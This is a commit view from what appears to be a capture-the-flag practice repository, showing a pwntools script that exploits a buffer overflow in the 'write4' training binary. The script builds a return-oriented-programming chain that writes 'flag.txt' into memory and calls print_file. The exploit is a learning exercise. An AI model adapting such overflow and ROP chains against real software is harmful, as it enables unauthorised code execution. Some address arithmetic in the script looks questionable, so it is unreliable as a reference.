3f54969f58
new file: x86_64/badchars/exploit_dirty.py new file: x86_64/badchars/usefullstuff deleted: x86_64/write4/.exploit.py.swp deleted: x86_64/write4/.useful_gadgets.swp modified: x86_64/write4/exploit.py
22 lines
775 B
Python
Executable File
22 lines
775 B
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
from time import sleep
|
|
|
|
prog = process('./write4')
|
|
payload = b''
|
|
for c in range(40):
|
|
payload += b'a'
|
|
|
|
payload += p64(0x0000000000400690) # pop r14, pop r15, ret
|
|
payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
|
|
payload += b"flag.txt" # our string (duh)
|
|
payload += p64(0x0000000000400628) # mov qword ptr [r14], r15 ; ret
|
|
payload += p64(0x0000000000400693) # pop rdi; ret
|
|
payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
|
|
payload += p64(0x0000000000400510) # print_file@plt
|
|
payload += b"\n"
|
|
prog.sendline(payload)
|
|
sleep(0.5)
|
|
print(str(prog.recv(), 'UTF-8'))
|
|
prog.close()
|